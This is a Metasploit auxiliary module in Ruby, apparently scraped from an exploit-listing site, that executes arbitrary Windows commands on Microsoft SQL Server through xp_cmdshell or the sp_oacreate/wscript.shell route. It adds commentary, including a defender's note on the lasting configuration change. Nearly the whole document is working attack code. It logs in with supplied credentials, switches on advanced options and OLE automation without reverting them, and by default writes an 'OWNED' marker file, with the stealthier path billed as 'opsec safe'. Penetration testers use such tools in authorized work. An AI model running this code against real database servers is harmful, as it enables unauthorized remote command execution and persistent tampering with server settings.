## https://sploitus.com/exploit?id=PACKETSTORM:180799
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
# Auxiliary module that runs a single Windows command on an MSSQL/MSDE instance
# through one of two server-side stored procedures (xp_cmdshell or
# sp_oacreate). Authentication comes either from an existing MSSQL session or
# from the datastore credentials handled by the Remote::MSSQL mixin.
class MetasploitModule < Msf::Auxiliary
  # Remote::MSSQL supplies mssql_login_datastore, mssql_query,
  # mssql_xpcmdshell and mssql_client; OptionalSession::MSSQL supplies
  # `session` / set_mssql_session so an already-open session can be reused.
  include Msf::Exploit::Remote::MSSQL
  include Msf::OptionalSession::MSSQL

  # Registers module metadata and the two options this module reads:
  # CMD (optional; the default writes a marker file to C:\owned.exe) and
  # TECHNIQUE (required enum: 'xp_cmdshell' or 'sp_oacreate').
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SQL Server Command Execution',
        'Description' => %q{
          This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the
          sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is
          required to use this module.
        },
        'Author' =>
          [
            'tebo <tebo[at]attackresearch.com>',
            'arcc <pw[at]evait.de>'
          ],
        'License' => MSF_LICENSE,
        'References' =>
          [
            [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
            [ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
          ],
      )
    )

    register_options([
      OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),
      OptEnum.new('TECHNIQUE', [true, 'Technique to use for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])
    ])
  end

  # Module entry point.
  #
  # Connection handling: an existing session is reused as-is; otherwise a
  # fresh login is attempted from the datastore. A failed login prints the
  # per-connection error strings (when present) and returns without raising.
  #
  # Dispatch: 'xp_cmdshell' calls mssql_xpcmdshell and, if that raises a
  # RuntimeError, falls back to the sp_oacreate path; 'sp_oacreate' goes
  # straight to mssql_spoacreate. Any other TECHNIQUE value matches no branch
  # and does nothing (the OptEnum should prevent that at option-validation time).
  #
  # @return [void]
  def run
    if session
      set_mssql_session(session.client)
    else
      unless mssql_login_datastore
        print_error("Error with mssql_login call")
        # initial_connection_info is assumed to be a Hash with an :errors
        # Array from the mixin — the guard below tolerates a missing key.
        info = self.mssql_client.initial_connection_info
        if info[:errors] && !info[:errors].empty?
          info[:errors].each do |err|
            print_error(err)
          end
        end
        return
      end
    end

    technique = datastore['TECHNIQUE']
    case technique
    when 'xp_cmdshell'
      begin
        # Second argument is passed through to the mixin; presumably it
        # requests output capture — confirm against mssql_xpcmdshell.
        mssql_xpcmdshell(datastore['CMD'], true)
      rescue RuntimeError
        # Only RuntimeError triggers the fallback; other errors propagate.
        print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')
        mssql_spoacreate
      end
    when 'sp_oacreate'
      mssql_spoacreate
    end
  end

  # Runs CMD via OLE automation (sp_oacreate / sp_oamethod on wscript.shell).
  #
  # Side effects on the server: two sp_configure settings ('show advanced
  # options' and 'Ole Automation Procedures') are switched on and committed
  # with RECONFIGURE, and nothing in this method switches them back — the
  # change outlives the module run. Defenders: that persistent configuration
  # change is the part of this technique worth alerting on, since the
  # command itself produces no result set ("No output will be displayed").
  #
  # CMD is interpolated into a single-quoted T-SQL literal without escaping,
  # so a value containing a single quote yields a malformed query rather
  # than a command run.
  #
  # @return [void]
  def mssql_spoacreate
    # doprint is forwarded to mssql_query; presumably it controls whether
    # query output is printed — TODO confirm in the Remote::MSSQL mixin.
    doprint = datastore['VERBOSE']
    print_status('Enabling advanced options and ole automation procedures.')
    mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)
    mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)
    print_good('Executing command using sp_oacreate. No output will be displayed.')
    mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)
  end
end